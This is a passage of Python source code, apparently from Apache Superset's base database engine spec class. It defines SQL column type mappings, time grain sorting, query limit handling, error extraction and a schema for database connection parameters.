re.compile(r"^(tiny|medium|long)?text", re.IGNORECASE),
types.String(),
GenericDataType.STRING,
),
(
re.compile(r"^smallint", re.IGNORECASE),
types.SmallInteger(),
GenericDataType.NUMERIC,
),
(
re.compile(r"^int(eger)?", re.IGNORECASE),
types.Integer(),
GenericDataType.NUMERIC,
),
(
re.compile(r"^bigint", re.IGNORECASE),
types.BigInteger(),
GenericDataType.NUMERIC,
),
(re.compile(r"^long", re.IGNORECASE), types.Float(), GenericDataType.NUMERIC,),
(
re.compile(r"^decimal", re.IGNORECASE),
types.Numeric(),
GenericDataType.NUMERIC,
),
(
re.compile(r"^numeric", re.IGNORECASE),
types.Numeric(),
GenericDataType.NUMERIC,
),
(re.compile(r"^float", re.IGNORECASE), types.Float(), GenericDataType.NUMERIC,),
(
re.compile(r"^double", re.IGNORECASE),
types.Float(),
GenericDataType.NUMERIC,
),
(re.compile(r"^real", re.IGNORECASE), types.REAL, GenericDataType.NUMERIC,),
(
re.compile(r"^smallserial", re.IGNORECASE),
types.SmallInteger(),
GenericDataType.NUMERIC,
),
(
re.compile(r"^serial", re.IGNORECASE),
types.Integer(),
GenericDataType.NUMERIC,
),
(
re.compile(r"^bigserial", re.IGNORECASE),
types.BigInteger(),
GenericDataType.NUMERIC,
),
(
re.compile(r"^money", re.IGNORECASE),
types.Numeric(),
GenericDataType.NUMERIC,
),
(
re.compile(r"^timestamp", re.IGNORECASE),
types.TIMESTAMP(),
GenericDataType.TEMPORAL,
),
(
re.compile(r"^datetime", re.IGNORECASE),
types.DateTime(),
GenericDataType.TEMPORAL,
),
(
re.compile(r"^date", re.IGNORECASE),
types.DateTime(),
GenericDataType.TEMPORAL,
),
(re.compile(r"^time", re.IGNORECASE), types.Time(), GenericDataType.TEMPORAL,),
(
re.compile(r"^interval", re.IGNORECASE),
types.Interval(),
GenericDataType.TEMPORAL,
),
(
re.compile(r"^bool(ean)?", re.IGNORECASE),
types.Boolean(),
GenericDataType.BOOLEAN,
),
)
# Does database support join-free timeslot grouping
time_groupby_inline = False
limit_method = LimitMethod.FORCE_LIMIT
time_secondary_columns = False
allows_joins = True
allows_subqueries = True
allows_alias_in_select = True
allows_alias_in_orderby = True
allows_sql_comments = True
allows_escaped_colons = True
# Whether ORDER BY clause can use aliases created in SELECT
# that are the same as a source column
allows_alias_to_source_column = True
# Whether ORDER BY clause must appear in SELECT
# if TRUE, then it doesn't have to.
allows_hidden_ordeby_agg = True
# Whether ORDER BY clause can use sql caculated expression
# if True, use alias of select column for `order by`
# the True is safely for most database
# But for backward compatibility, False by default
allows_hidden_cc_in_orderby = False
force_column_alias_quotes = False
arraysize = 0
max_column_name_length = 0
try_remove_schema_from_table_name = True # pylint: disable=invalid-name
run_multiple_statements_as_one = False
custom_errors: Dict[
Pattern[str], Tuple[str, SupersetErrorType, Dict[str, Any]]
] = {}
@classmethod
def get_dbapi_exception_mapping(cls) -> Dict[Type[Exception], Type[Exception]]:
"""
Each engine can implement and converge its own specific exceptions into
Superset DBAPI exceptions
Note: On python 3.9 this method can be changed to a classmethod property
without the need of implementing a metaclass type
:return: A map of driver specific exception to superset custom exceptions
"""
return {}
@classmethod
def get_dbapi_mapped_exception(cls, exception: Exception) -> Exception:
"""
Get a superset custom DBAPI exception from the driver specific exception.
Override if the engine needs to perform extra changes to the exception, for
example change the exception message or implement custom more complex logic
:param exception: The driver specific exception
:return: Superset custom DBAPI exception
"""
new_exception = cls.get_dbapi_exception_mapping().get(type(exception))
if not new_exception:
return exception
return new_exception(str(exception))
@classmethod
def get_allow_cost_estimate( # pylint: disable=unused-argument
cls, extra: Dict[str, Any],
) -> bool:
return False
@classmethod
def get_text_clause(cls, clause: str) -> TextClause:
"""
SQLALchemy wrapper to ensure text clauses are escaped properly
:param clause: string clause with potentially unescaped characters
:return: text clause with escaped characters
"""
if cls.allows_escaped_colons:
clause = clause.replace(":", "\\:")
return text(clause)
@classmethod
def get_engine(
cls,
database: "Database",
schema: Optional[str] = None,
source: Optional[utils.QuerySource] = None,
) -> Engine:
user_name = utils.get_username()
return database.get_sqla_engine(
schema=schema, nullpool=True, user_name=user_name, source=source
)
@classmethod
def get_timestamp_expr(
cls,
col: ColumnClause,
pdf: Optional[str],
time_grain: Optional[str],
type_: Optional[str] = None,
) -> TimestampExpression:
"""
Construct a TimestampExpression to be used in a SQLAlchemy query.
:param col: Target column for the TimestampExpression
:param pdf: date format (seconds or milliseconds)
:param time_grain: time grain, e.g. P1Y for 1 year
:param type_: the source column type
:return: TimestampExpression object
"""
if time_grain:
time_expr = cls.get_time_grain_expressions().get(time_grain)
if not time_expr:
raise NotImplementedError(
f"No grain spec for {time_grain} for database {cls.engine}"
)
if type_ and "{func}" in time_expr:
date_trunc_function = cls._date_trunc_functions.get(type_)
if date_trunc_function:
time_expr = time_expr.replace("{func}", date_trunc_function)
if type_ and "{type}" in time_expr:
date_trunc_function = cls._date_trunc_functions.get(type_)
if date_trunc_function:
time_expr = time_expr.replace("{type}", type_)
else:
time_expr = "{col}"
# if epoch, translate to DATE using db specific conf
if pdf == "epoch_s":
time_expr = time_expr.replace("{col}", cls.epoch_to_dttm())
elif pdf == "epoch_ms":
time_expr = time_expr.replace("{col}", cls.epoch_ms_to_dttm())
return TimestampExpression(time_expr, col, type_=col.type)
@classmethod
def get_time_grains(cls) -> Tuple[TimeGrain, ...]:
"""
Generate a tuple of supported time grains.
:return: All time grains supported by the engine
"""
ret_list = []
time_grains = builtin_time_grains.copy()
time_grains.update(current_app.config["TIME_GRAIN_ADDONS"])
for duration, func in cls.get_time_grain_expressions().items():
if duration in time_grains:
name = time_grains[duration]
ret_list.append(TimeGrain(name, _(name), func, duration))
return tuple(ret_list)
@classmethod
def _sort_time_grains(
cls, val: Tuple[Optional[str], str], index: int
) -> Union[float, int, str]:
"""
Return an ordered time-based value of a portion of a time grain
for sorting
Values are expected to be either None or start with P or PT
Have a numerical value in the middle and end with
a value for the time interval
It can also start or end with epoch start time denoting a range
i.e, week beginning or ending with a day
"""
pos = {
"FIRST": 0,
"SECOND": 1,
"THIRD": 2,
"LAST": 3,
}
if val[0] is None:
return pos["FIRST"]
prog = re.compile(r"(.*\/)?(P|PT)([0-9\.]+)(S|M|H|D|W|M|Y)(\/.*)?")
result = prog.match(val[0])
# for any time grains that don't match the format, put them at the end
if result is None:
return pos["LAST"]
second_minute_hour = ["S", "M", "H"]
day_week_month_year = ["D", "W", "M", "Y"]
is_less_than_day = result.group(2) == "PT"
interval = result.group(4)
epoch_time_start_string = result.group(1) or result.group(5)
has_starting_or_ending = bool(len(epoch_time_start_string or ""))
def sort_day_week() -> int:
if has_starting_or_ending:
return pos["LAST"]
if is_less_than_day:
return pos["SECOND"]
return pos["THIRD"]
def sort_interval() -> float:
if is_less_than_day:
return second_minute_hour.index(interval)
return day_week_month_year.index(interval)
# 0: all "PT" values should come before "P" values (i.e, PT10M)
# 1: order values within the above arrays ("D" before "W")
# 2: sort by numeric value (PT10M before PT15M)
# 3: sort by any week starting/ending values
plist = {
0: sort_day_week(),
1: pos["SECOND"] if is_less_than_day else pos["THIRD"],
2: sort_interval(),
3: float(result.group(3)),
}
return plist.get(index, 0)
@classmethod
def get_time_grain_expressions(cls) -> Dict[Optional[str], str]:
"""
Return a dict of all supported time grains including any potential added grains
but excluding any potentially disabled grains in the config file.
:return: All time grain expressions supported by the engine
"""
# TODO: use @memoize decorator or similar to avoid recomputation on every call
time_grain_expressions = cls._time_grain_expressions.copy()
grain_addon_expressions = current_app.config["TIME_GRAIN_ADDON_EXPRESSIONS"]
time_grain_expressions.update(grain_addon_expressions.get(cls.engine, {}))
denylist: List[str] = current_app.config["TIME_GRAIN_DENYLIST"]
for key in denylist:
time_grain_expressions.pop(key)
return dict(
sorted(
time_grain_expressions.items(),
key=lambda x: (
cls._sort_time_grains(x, 0),
cls._sort_time_grains(x, 1),
cls._sort_time_grains(x, 2),
cls._sort_time_grains(x, 3),
),
)
)
@classmethod
def fetch_data(
cls, cursor: Any, limit: Optional[int] = None
) -> List[Tuple[Any, ...]]:
"""
:param cursor: Cursor instance
:param limit: Maximum number of rows to be returned by the cursor
:return: Result of query
"""
if cls.arraysize:
cursor.arraysize = cls.arraysize
try:
if cls.limit_method == LimitMethod.FETCH_MANY and limit:
return cursor.fetchmany(limit)
return cursor.fetchall()
except Exception as ex:
raise cls.get_dbapi_mapped_exception(ex)
@classmethod
def expand_data(
cls, columns: List[Dict[Any, Any]], data: List[Dict[Any, Any]]
) -> Tuple[List[Dict[Any, Any]], List[Dict[Any, Any]], List[Dict[Any, Any]]]:
"""
Some engines support expanding nested fields. See implementation in Presto
spec for details.
:param columns: columns selected in the query
:param data: original data set
:return: list of all columns(selected columns and their nested fields),
expanded data set, listed of nested fields
"""
return columns, data, []
@classmethod
def alter_new_orm_column(cls, orm_col: "TableColumn") -> None:
"""Allow altering default column attributes when first detected/added
For instance special column like `__time` for Druid can be
set to is_dttm=True. Note that this only gets called when new
columns are detected/created"""
# TODO: Fix circular import caused by importing TableColumn
@classmethod
def epoch_to_dttm(cls) -> str:
"""
SQL expression that converts epoch (seconds) to datetime that can be used in a
query. The reference column should be denoted as `{col}` in the return
expression, e.g. "FROM_UNIXTIME({col})"
:return: SQL Expression
"""
raise NotImplementedError()
@classmethod
def epoch_ms_to_dttm(cls) -> str:
"""
SQL expression that converts epoch (milliseconds) to datetime that can be used
in a query.
:return: SQL Expression
"""
return cls.epoch_to_dttm().replace("{col}", "({col}/1000)")
@classmethod
def get_datatype(cls, type_code: Any) -> Optional[str]:
"""
Change column type code from cursor description to string representation.
:param type_code: Type code from cursor description
:return: String representation of type code
"""
if isinstance(type_code, str) and type_code != "":
return type_code.upper()
return None
@classmethod
def normalize_indexes(cls, indexes: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
"""
Normalizes indexes for more consistency across db engines
noop by default
:param indexes: Raw indexes as returned by SQLAlchemy
:return: cleaner, more aligned index definition
"""
return indexes
@classmethod
def extra_table_metadata( # pylint: disable=unused-argument
cls, database: "Database", table_name: str, schema_name: str,
) -> Dict[str, Any]:
"""
Returns engine-specific table metadata
:param database: Database instance
:param table_name: Table name
:param schema_name: Schema name
:return: Engine-specific table metadata
"""
# TODO: Fix circular import caused by importing Database
return {}
@classmethod
def apply_limit_to_sql(
cls, sql: str, limit: int, database: "Database", force: bool = False
) -> str:
"""
Alters the SQL statement to apply a LIMIT clause
:param sql: SQL query
:param limit: Maximum number of rows to be returned by the query
:param database: Database instance
:return: SQL query with limit clause
"""
# TODO: Fix circular import caused by importing Database
if cls.limit_method == LimitMethod.WRAP_SQL:
sql = sql.strip("\t\n ;")
qry = (
select("*")
.select_from(TextAsFrom(text(sql), ["*"]).alias("inner_qry"))
.limit(limit)
)
return database.compile_sqla_query(qry)
if cls.limit_method == LimitMethod.FORCE_LIMIT:
parsed_query = sql_parse.ParsedQuery(sql)
sql = parsed_query.set_or_update_query_limit(limit, force=force)
return sql
@classmethod
def get_limit_from_sql(cls, sql: str) -> Optional[int]:
"""
Extract limit from SQL query
:param sql: SQL query
:return: Value of limit clause in query
"""
parsed_query = sql_parse.ParsedQuery(sql)
return parsed_query.limit
@classmethod
def set_or_update_query_limit(cls, sql: str, limit: int) -> str:
"""
Create a query based on original query but with new limit clause
:param sql: SQL query
:param limit: New limit to insert/replace into query
:return: Query with new limit
"""
parsed_query = sql_parse.ParsedQuery(sql)
return parsed_query.set_or_update_query_limit(limit)
@classmethod
def df_to_sql(
cls,
database: "Database",
table: Table,
df: pd.DataFrame,
to_sql_kwargs: Dict[str, Any],
) -> None:
"""
Upload data from a Pandas DataFrame to a database.
For regular engines this calls the `pandas.DataFrame.to_sql` method. Can be
overridden for engines that don't work well with this method, e.g. Hive and
BigQuery.
Note this method does not create metadata for the table.
:param database: The database to upload the data to
:param table: The table to upload the data to
:param df: The dataframe with data to be uploaded
:param to_sql_kwargs: The kwargs to be passed to pandas.DataFrame.to_sql` method
"""
engine = cls.get_engine(database)
to_sql_kwargs["name"] = table.table
if table.schema:
# Only add schema when it is preset and non empty.
to_sql_kwargs["schema"] = table.schema
if engine.dialect.supports_multivalues_insert:
to_sql_kwargs["method"] = "multi"
df.to_sql(con=engine, **to_sql_kwargs)
@classmethod
def convert_dttm( # pylint: disable=unused-argument
cls, target_type: str, dttm: datetime, db_extra: Optional[Dict[str, Any]] = None
) -> Optional[str]:
"""
Convert Python datetime object to a SQL expression
:param target_type: The target type of expression
:param dttm: The datetime object
:param db_extra: The database extra object
:return: The SQL expression
"""
return None
@classmethod
def get_all_datasource_names(
cls, database: "Database", datasource_type: str
) -> List[utils.DatasourceName]:
"""Returns a list of all tables or views in database.
:param database: Database instance
:param datasource_type: Datasource_type can be 'table' or 'view'
:return: List of all datasources in database or schema
"""
# TODO: Fix circular import caused by importing Database
schemas = database.get_all_schema_names(
cache=database.schema_cache_enabled,
cache_timeout=database.schema_cache_timeout,
force=True,
)
all_datasources: List[utils.DatasourceName] = []
for schema in schemas:
if datasource_type == "table":
all_datasources += database.get_all_table_names_in_schema(
schema=schema,
force=True,
cache=database.table_cache_enabled,
cache_timeout=database.table_cache_timeout,
)
elif datasource_type == "view":
all_datasources += database.get_all_view_names_in_schema(
schema=schema,
force=True,
cache=database.table_cache_enabled,
cache_timeout=database.table_cache_timeout,
)
else:
raise Exception(f"Unsupported datasource_type: {datasource_type}")
return all_datasources
@classmethod
def handle_cursor(cls, cursor: Any, query: Query, session: Session) -> None:
"""Handle a live cursor between the execute and fetchall calls
The flow works without this method doing anything, but it allows
for handling the cursor and updating progress information in the
query object"""
# TODO: Fix circular import error caused by importing sql_lab.Query
@classmethod
def extract_error_message(cls, ex: Exception) -> str:
return f"{cls.engine} error: {cls._extract_error_message(ex)}"
@classmethod
def _extract_error_message(cls, ex: Exception) -> str:
"""Extract error message for queries"""
return utils.error_msg_from_exception(ex)
@classmethod
def extract_errors(
cls, ex: Exception, context: Optional[Dict[str, Any]] = None
) -> List[SupersetError]:
raw_message = cls._extract_error_message(ex)
context = context or {}
for regex, (message, error_type, extra) in cls.custom_errors.items():
match = regex.search(raw_message)
if match:
params = {**context, **match.groupdict()}
extra["engine_name"] = cls.engine_name
return [
SupersetError(
error_type=error_type,
message=message % params,
level=ErrorLevel.ERROR,
extra=extra,
)
]
return [
SupersetError(
error_type=SupersetErrorType.GENERIC_DB_ENGINE_ERROR,
message=cls._extract_error_message(ex),
level=ErrorLevel.ERROR,
extra={"engine_name": cls.engine_name},
)
]
@classmethod
def adjust_database_uri(cls, uri: URL, selected_schema: Optional[str]) -> None:
"""
Mutate the database component of the SQLAlchemy URI.
The URI here represents the URI as entered when saving the database,
``selected_schema`` is the schema currently active presumably in
the SQL Lab dropdown. Based on that, for some database engine,
we can return a new altered URI that connects straight to the
active schema, meaning the users won't have to prefix the object
names by the schema name.
Some databases engines have 2 level of namespacing: database and
schema (postgres, oracle, mssql, ...)
For those it's probably better to not alter the database
component of the URI with the schema name, it won't work.
Some database drivers like presto accept '{catalog}/{schema}' in
the database component of the URL, that can be handled here.
"""
@classmethod
def patch(cls) -> None:
"""
TODO: Improve docstring and refactor implementation in Hive
"""
@classmethod
def get_schema_names(cls, inspector: Inspector) -> List[str]:
"""
Get all schemas from database
:param inspector: SqlAlchemy inspector
:return: All schemas in the database
"""
return sorted(inspector.get_schema_names())
@classmethod
def get_table_names( # pylint: disable=unused-argument
cls, database: "Database", inspector: Inspector, schema: Optional[str],
) -> List[str]:
"""
Get all tables from schema
:param database: The database to get info
:param inspector: SqlAlchemy inspector
:param schema: Schema to inspect. If omitted, uses default schema for database
:return: All tables in schema
"""
tables = inspector.get_table_names(schema)
if schema and cls.try_remove_schema_from_table_name:
tables = [re.sub(f"^{schema}\\.", "", table) for table in tables]
return sorted(tables)
@classmethod
def get_view_names( # pylint: disable=unused-argument
cls, database: "Database", inspector: Inspector, schema: Optional[str],
) -> List[str]:
"""
Get all views from schema
:param database: The database to get info
:param inspector: SqlAlchemy inspector
:param schema: Schema name. If omitted, uses default schema for database
:return: All views in schema
"""
views = inspector.get_view_names(schema)
if schema and cls.try_remove_schema_from_table_name:
views = [re.sub(f"^{schema}\\.", "", view) for view in views]
return sorted(views)
@classmethod
def get_table_comment(
cls, inspector: Inspector, table_name: str, schema: Optional[str]
) -> Optional[str]:
"""
Get comment of table from a given schema and table
:param inspector: SqlAlchemy Inspector instance
:param table_name: Table name
:param schema: Schema name. If omitted, uses default schema for database
:return: comment of table
"""
comment = None
try:
comment = inspector.get_table_comment(table_name, schema)
comment = comment.get("text") if isinstance(comment, dict) else None
except NotImplementedError:
# It's expected that some dialects don't implement the comment method
pass
except Exception as ex: # pylint: disable=broad-except
logger.error("Unexpected error while fetching table comment", exc_info=True)
logger.exception(ex)
return comment
@classmethod
def get_columns(
cls, inspector: Inspector, table_name: str, schema: Optional[str]
) -> List[Dict[str, Any]]:
"""
Get all columns from a given schema and table
:param inspector: SqlAlchemy Inspector instance
:param table_name: Table name
:param schema: Schema name. If omitted, uses default schema for database
:return: All columns in table
"""
return inspector.get_columns(table_name, schema)
@classmethod
def where_latest_partition( # pylint: disable=too-many-arguments,unused-argument
cls,
table_name: str,
schema: Optional[str],
database: "Database",
query: Select,
columns: Optional[List[Dict[str, str]]] = None,
) -> Optional[Select]:
"""
Add a where clause to a query to reference only the most recent partition
:param table_name: Table name
:param schema: Schema name
:param database: Database instance
:param query: SqlAlchemy query
:param columns: List of TableColumns
:return: SqlAlchemy query with additional where clause referencing the latest
partition
"""
# TODO: Fix circular import caused by importing Database, TableColumn
return None
@classmethod
def _get_fields(cls, cols: List[Dict[str, Any]]) -> List[Any]:
return [column(c["name"]) for c in cols]
@classmethod
def select_star( # pylint: disable=too-many-arguments,too-many-locals
cls,
database: "Database",
table_name: str,
engine: Engine,
schema: Optional[str] = None,
limit: int = 100,
show_cols: bool = False,
indent: bool = True,
latest_partition: bool = True,
cols: Optional[List[Dict[str, Any]]] = None,
) -> str:
"""
Generate a "SELECT * from [schema.]table_name" query with appropriate limit.
WARNING: expects only unquoted table and schema names.
:param database: Database instance
:param table_name: Table name, unquoted
:param engine: SqlAlchemy Engine instance
:param schema: Schema, unquoted
:param limit: limit to impose on query
:param show_cols: Show columns in query; otherwise use "*"
:param indent: Add indentation to query
:param latest_partition: Only query the latest partition
:param cols: Columns to include in query
:return: SQL query
"""
# pylint: disable=redefined-outer-name
fields: Union[str, List[Any]] = "*"
cols = cols or []
if (show_cols or latest_partition) and not cols:
cols = database.get_columns(table_name, schema)
if show_cols:
fields = cls._get_fields(cols)
quote = engine.dialect.identifier_preparer.quote
if schema:
full_table_name = quote(schema) + "." + quote(table_name)
else:
full_table_name = quote(table_name)
qry = select(fields).select_from(text(full_table_name))
if limit:
qry = qry.limit(limit)
if latest_partition:
partition_query = cls.where_latest_partition(
table_name, schema, database, qry, columns=cols
)
if partition_query is not None:
qry = partition_query
sql = database.compile_sqla_query(qry)
if indent:
sql = sqlparse.format(sql, reindent=True)
return sql
@classmethod
def estimate_statement_cost(cls, statement: str, cursor: Any) -> Dict[str, Any]:
"""
Generate a SQL query that estimates the cost of a given statement.
:param statement: A single SQL statement
:param cursor: Cursor instance
:return: Dictionary with different costs
"""
raise Exception("Database does not support cost estimation")
@classmethod
def query_cost_formatter(
cls, raw_cost: List[Dict[str, Any]]
) -> List[Dict[str, str]]:
"""
Format cost estimate.
:param raw_cost: Raw estimate from `estimate_query_cost`
:return: Human readable cost estimate
"""
raise Exception("Database does not support cost estimation")
@classmethod
def process_statement(
cls, statement: str, database: "Database", user_name: str
) -> str:
"""
Process a SQL statement by stripping and mutating it.
:param statement: A single SQL statement
:param database: Database instance
:param user_name: Effective username
:return: Dictionary with different costs
"""
parsed_query = ParsedQuery(statement)
sql = parsed_query.stripped()
sql_query_mutator = current_app.config["SQL_QUERY_MUTATOR"]
if sql_query_mutator:
sql = sql_query_mutator(sql, user_name, security_manager, database)
return sql
@classmethod
def estimate_query_cost(
cls,
database: "Database",
schema: str,
sql: str,
source: Optional[utils.QuerySource] = None,
) -> List[Dict[str, Any]]:
"""
Estimate the cost of a multiple statement SQL query.
:param database: Database instance
:param schema: Database schema
:param sql: SQL query with possibly multiple statements
:param source: Source of the query (eg, "sql_lab")
"""
extra = database.get_extra() or {}
if not cls.get_allow_cost_estimate(extra):
raise Exception("Database does not support cost estimation")
user_name = g.user.username if g.user and hasattr(g.user, "username") else None
parsed_query = sql_parse.ParsedQuery(sql)
statements = parsed_query.get_statements()
engine = cls.get_engine(database, schema=schema, source=source)
costs = []
with closing(engine.raw_connection()) as conn:
cursor = conn.cursor()
for statement in statements:
processed_statement = cls.process_statement(
statement, database, user_name
)
costs.append(cls.estimate_statement_cost(processed_statement, cursor))
return costs
@classmethod
def modify_url_for_impersonation(
cls, url: URL, impersonate_user: bool, username: Optional[str]
) -> None:
"""
Modify the SQL Alchemy URL object with the user to impersonate if applicable.
:param url: SQLAlchemy URL object
:param impersonate_user: Flag indicating if impersonation is enabled
:param username: Effective username
"""
if impersonate_user and username is not None:
url.username = username
@classmethod
def update_impersonation_config(
cls, connect_args: Dict[str, Any], uri: str, username: Optional[str],
) -> None:
"""
Update a configuration dictionary
that can set the correct properties for impersonating users
:param connect_args: config to be updated
:param uri: URI
:param username: Effective username
:return: None
"""
@classmethod
def execute( # pylint: disable=unused-argument
cls, cursor: Any, query: str, **kwargs: Any,
) -> None:
"""
Execute a SQL query
:param cursor: Cursor instance
:param query: Query to execute
:param kwargs: kwargs to be passed to cursor.execute()
:return:
"""
if not cls.allows_sql_comments:
query = sql_parse.strip_comments_from_sql(query)
if cls.arraysize:
cursor.arraysize = cls.arraysize
try:
cursor.execute(query)
except Exception as ex:
raise cls.get_dbapi_mapped_exception(ex)
@classmethod
def make_label_compatible(cls, label: str) -> Union[str, quoted_name]:
"""
Conditionally mutate and/or quote a sqlalchemy expression label. If
force_column_alias_quotes is set to True, return the label as a
sqlalchemy.sql.elements.quoted_name object to ensure that the select query
and query results have same case. Otherwise, return the mutated label as a
regular string. If maximum supported column name length is exceeded,
generate a truncated label by calling truncate_label().
:param label: expected expression label/alias
:return: conditionally mutated label supported by the db engine
"""
label_mutated = cls._mutate_label(label)
if (
cls.max_column_name_length
and len(label_mutated) > cls.max_column_name_length
):
label_mutated = cls._truncate_label(label)
if cls.force_column_alias_quotes:
label_mutated = quoted_name(label_mutated, True)
return label_mutated
@classmethod
def get_sqla_column_type(
cls,
column_type: Optional[str],
column_type_mappings: Tuple[ColumnTypeMapping, ...] = column_type_mappings,
) -> Optional[Tuple[TypeEngine, GenericDataType]]:
"""
Return a sqlalchemy native column type that corresponds to the column type
defined in the data source (return None to use default type inferred by
SQLAlchemy). Override `column_type_mappings` for specific needs
(see MSSQL for example of NCHAR/NVARCHAR handling).
:param column_type: Column type returned by inspector
:param column_type_mappings: Maps from string to SqlAlchemy TypeEngine
:return: SqlAlchemy column type
"""
if not column_type:
return None
for regex, sqla_type, generic_type in column_type_mappings:
match = regex.match(column_type)
if not match:
continue
if callable(sqla_type):
return sqla_type(match), generic_type
return sqla_type, generic_type
return None
@staticmethod
def _mutate_label(label: str) -> str:
"""
Most engines support mixed case aliases that can include numbers
and special characters, like commas, parentheses etc. For engines that
have restrictions on what types of aliases are supported, this method
can be overridden to ensure that labels conform to the engine's
limitations. Mutated labels should be deterministic (input label A always
yields output label X) and unique (input labels A and B don't yield the same
output label X).
:param label: Preferred expression label
:return: Conditionally mutated label
"""
return label
@classmethod
def _truncate_label(cls, label: str) -> str:
"""
In the case that a label exceeds the max length supported by the engine,
this method is used to construct a deterministic and unique label based on
the original label. By default, this returns a md5 hash of the original label,
conditionally truncated if the length of the hash exceeds the max column length
of the engine.
:param label: Expected expression label
:return: Truncated label
"""
label = md5_sha_from_str(label)
# truncate hash if it exceeds max length
if cls.max_column_name_length and len(label) > cls.max_column_name_length:
label = label[: cls.max_column_name_length]
return label
@classmethod
def column_datatype_to_string(
cls, sqla_column_type: TypeEngine, dialect: Dialect
) -> str:
"""
Convert sqlalchemy column type to string representation.
By default, removes collation and character encoding info to avoid
unnecessarily long datatypes.
:param sqla_column_type: SqlAlchemy column type
:param dialect: Sqlalchemy dialect
:return: Compiled column type
"""
sqla_column_type = sqla_column_type.copy()
if hasattr(sqla_column_type, "collation"):
sqla_column_type.collation = None
if hasattr(sqla_column_type, "charset"):
sqla_column_type.charset = None
return sqla_column_type.compile(dialect=dialect).upper()
@classmethod
def get_function_names( # pylint: disable=unused-argument
cls, database: "Database",
) -> List[str]:
"""
Get a list of function names that are able to be called on the database.
Used for SQL Lab autocomplete.
:param database: The database to get functions for
:return: A list of function names useable in the database
"""
return []
@staticmethod
def pyodbc_rows_to_tuples(data: List[Any]) -> List[Tuple[Any, ...]]:
"""
Convert pyodbc.Row objects from `fetch_data` to tuples.
:param data: List of tuples or pyodbc.Row objects
:return: List of tuples
"""
if data and type(data[0]).__name__ == "Row":
data = [tuple(row) for row in data]
return data
@staticmethod
def mutate_db_for_connection_test( # pylint: disable=unused-argument
database: "Database",
) -> None:
"""
Some databases require passing additional parameters for validating database
connections. This method makes it possible to mutate the database instance prior
to testing if a connection is ok.
:param database: instance to be mutated
"""
return None
@staticmethod
def get_extra_params(database: "Database") -> Dict[str, Any]:
"""
Some databases require adding elements to connection parameters,
like passing certificates to `extra`. This can be done here.
:param database: database instance from which to extract extras
:raises CertificateException: If certificate is not valid/unparseable
"""
extra: Dict[str, Any] = {}
if database.extra:
try:
extra = json.loads(database.extra)
except json.JSONDecodeError as ex:
logger.error(ex, exc_info=True)
raise ex
return extra
@staticmethod
def update_encrypted_extra_params(
database: "Database", params: Dict[str, Any]
) -> None:
"""
Some databases require some sensitive information which do not conform to
the username:password syntax normally used by SQLAlchemy.
:param database: database instance from which to extract extras
:param params: params to be updated
"""
if not database.encrypted_extra:
return
try:
encrypted_extra = json.loads(database.encrypted_extra)
params.update(encrypted_extra)
except json.JSONDecodeError as ex:
logger.error(ex, exc_info=True)
raise ex
@classmethod
def is_readonly_query(cls, parsed_query: ParsedQuery) -> bool:
"""Pessimistic readonly, 100% sure statement won't mutate anything"""
return (
parsed_query.is_select()
or parsed_query.is_explain()
or parsed_query.is_show()
)
@classmethod
def is_select_query(cls, parsed_query: ParsedQuery) -> bool:
"""
Determine if the statement should be considered as SELECT statement.
Some query dialects do not contain "SELECT" word in queries (eg. Kusto)
"""
return parsed_query.is_select()
@classmethod
def get_column_spec( # pylint: disable=unused-argument
cls,
native_type: Optional[str],
db_extra: Optional[Dict[str, Any]] = None,
source: utils.ColumnTypeSource = utils.ColumnTypeSource.GET_TABLE,
column_type_mappings: Tuple[ColumnTypeMapping, ...] = column_type_mappings,
) -> Optional[ColumnSpec]:
"""
Converts native database type to sqlalchemy column type.
:param native_type: Native database type
:param db_extra: The database extra object
:param source: Type coming from the database table or cursor description
:param column_type_mappings: Maps from string to SqlAlchemy TypeEngine
:return: ColumnSpec object
"""
col_types = cls.get_sqla_column_type(
native_type, column_type_mappings=column_type_mappings
)
if col_types:
column_type, generic_type = col_types
# wrap temporal types in custom type that supports literal binding
# using datetimes
if generic_type == GenericDataType.TEMPORAL:
column_type = literal_dttm_type_factory(
column_type, cls, native_type or "", db_extra=db_extra or {}
)
is_dttm = generic_type == GenericDataType.TEMPORAL
return ColumnSpec(
sqla_type=column_type, generic_type=generic_type, is_dttm=is_dttm
)
return None
@classmethod
def has_implicit_cancel(cls) -> bool:
"""
Return True if the live cursor handles the implicit cancelation of the query,
False otherise.
:return: Whether the live cursor implicitly cancels the query
:see: handle_cursor
"""
return False
@classmethod
def get_cancel_query_id( # pylint: disable=unused-argument
cls, cursor: Any, query: Query,
) -> Optional[str]:
"""
Select identifiers from the database engine that uniquely identifies the
queries to cancel. The identifier is typically a session id, process id
or similar.
:param cursor: Cursor instance in which the query will be executed
:param query: Query instance
:return: Query identifier
"""
return None
@classmethod
def cancel_query( # pylint: disable=unused-argument
cls, cursor: Any, query: Query, cancel_query_id: str,
) -> bool:
"""
Cancel query in the underlying database.
:param cursor: New cursor instance to the db of the query
:param query: Query instance
:param cancel_query_id: Value returned by get_cancel_query_payload or set in
other life-cycle methods of the query
:return: True if query cancelled successfully, False otherwise
"""
return False
@classmethod
def parse_sql(cls, sql: str) -> List[str]:
return [str(s).strip(" ;") for s in sqlparse.parse(sql)]
# schema for adding a database by providing parameters instead of the
# full SQLAlchemy URI
class BasicParametersSchema(Schema):
username = fields.String(required=True, allow_none=True, description=__("Username"))
password = fields.String(allow_none=True, description=__("Password"))
host = fields.String(required=True, description=__("Hostname or IP address"))
port = fields.Integer(
required=True,
description=__("Database port"),
validate=Range(min=0, max=2 ** 16, max_inclusive=False),
)
database = fields.String(required=True, description=__("Database name"))
query = fields.Dict(
keys=fields.Str(), values=fields.Raw(), description=__("Additional parameters")
)
encryption = fields.Boolean(
required=False, description=__("Use an encrypted connection to the database")
)
class BasicParametersType(TypedDict, total=False):
username: Optional[str]
password: Optional[str]
host: str
port: int
database: str
query: Dict[str, Any]
encryption: bool
class BasicParametersMixin:
"""
Mixin for configuring DB engine specs via a dictionary.
With this mixin the SQLAlchemy engine can be configured through
individual parameters, instead of the full SQLAlchemy URI. This
mixin is for the most common pattern of URI:
engine+driver://user:password@host:port/dbname[?key=value&key=value...]
"""
# schema describing the parameters used to configure the DB
parameters_schema = BasicParametersSchema()
# recommended driver name for the DB engine spec
default_driver = ""
# placeholder with the SQLAlchemy URI template
sqlalchemy_uri_placeholder = (
"engine+driver://user:password@host:port/dbname[?key=value&key=value...]"
)
# query parameter to enable encryption in the database connection
# for Postgres this would be `{"sslmode": "verify-ca"}`, eg.
encryption_parameters: Dict[str, str] = {}
@classmethod
